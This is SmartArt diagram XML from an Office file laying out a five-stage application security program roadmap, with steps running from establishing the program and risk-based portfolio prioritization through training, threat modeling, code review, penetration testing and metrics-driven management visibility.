    <dgm:cxn modelId="{F34BF083-B836-4506-BB3B-F0A01920D227}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F474165F-1E84-42E2-A98E-15E6795C7260}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{024BBBE2-0706-4354-8AB0-3262009E8862}" srcOrd="2" destOrd="0" parTransId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" sibTransId="{C468EA37-5762-4D06-A4F9-E930ECF24341}"/>
    <dgm:cxn modelId="{754476D4-7D8C-427D-8A6B-D0B60927777C}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{53179D04-4118-4358-AD17-8CE5C48A534D}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6010088D-1046-466A-BB02-8A55CE262380}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" srcOrd="3" destOrd="0" parTransId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" sibTransId="{6249606A-E44B-456D-8550-331FDC0465D3}"/>
    <dgm:cxn modelId="{B1A30578-DD79-4939-A9F8-28AD03B8AD54}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6CB25451-4220-4743-96D9-4B8B3C4F99CD}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{617DA6D3-BEB8-4800-B1FC-98C29EF082A0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9C6E9520-F5C2-41C7-A061-0140218D1DED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A201EAD9-991A-486D-9848-464B08813756}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{36BB49A6-E6C7-4A97-BA09-E504B9A5CB87}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73C77C7A-7151-4540-A36C-02BAF86C1D7F}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6FF81300-4B71-426C-BE41-95BEFFB4F7EB}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C2CAE34C-DC3F-402B-9C24-F36E10DF6763}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1A025FFD-43A9-440F-BAC4-21396F32E15C}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{00B07580-E77C-441E-9EF2-B3E1DE4DA8D2}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3F81A852-98E1-4146-8C30-A1EE27A68299}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C265CBBA-7FC7-4526-B04E-A83BFEDA4408}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26135150-1EEE-452C-9216-92014AD56077}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{505F2738-E317-4DE0-968D-8CAB62E9FE6A}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{98C8E5A8-9EB9-4BBF-9275-14B19FB13AD3}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D700CFC9-8390-4DFA-A6C1-CF888D9B4617}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D6106061-6CBE-4AC7-A61D-98FB10E8573B}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BDF4D38-2D31-4652-8413-675C17D298B1}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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4314627" y="-2191458"/>
          <a:ext cx="937021"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l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> and drive adoption. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Conduct </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>define </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>key </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>improvement areas and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>an execution </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>plan. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Gain </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>application security awareness </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> for the entire IT </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>organization.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2003362" y="165549"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2678"/>
          <a:ext cx="909184" cy="117127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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Get Started</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138560" y="47061"/>
        <a:ext cx="820418" cy="1082511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="-961617"/>
          <a:ext cx="937021"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l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Identify and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>prioritize your application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> from an inherent risk perspective. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Create an application risk profiling model to measure and prioritize all your applications and APIs. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="1395390"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="1232520"/>
          <a:ext cx="938893" cy="117127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en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Risk Based Portfolio Approach</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="1278353"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="268223"/>
          <a:ext cx="937021"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l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> that provide an application security baseline for all development teams to adhere to.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>common set of reusable security controls</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> that complement these policies and standards and provide design and development guidance on their use.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> that is required and targeted to different development roles and topics.  </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="2625230"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2462361"/>
          <a:ext cx="938893" cy="117127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en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Enable with a Strong Foundation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="2508194"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="1498065"/>
          <a:ext cx="937021"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l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>secure implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> activities into existing development and operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>Threat Modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, Secure Design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, Secure Coding &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>Code Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>Penetration Testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, and Remediation.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> to be successful.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="3855072"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="3692202"/>
          <a:ext cx="938893" cy="117127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en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Integrate Security  into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="3738035"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="2727906"/>
          <a:ext cx="937021"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l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="5084913"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="4922043"/>
          <a:ext cx="938893" cy="117127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en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Provide Management Visibility</a:t>
          </a:r>
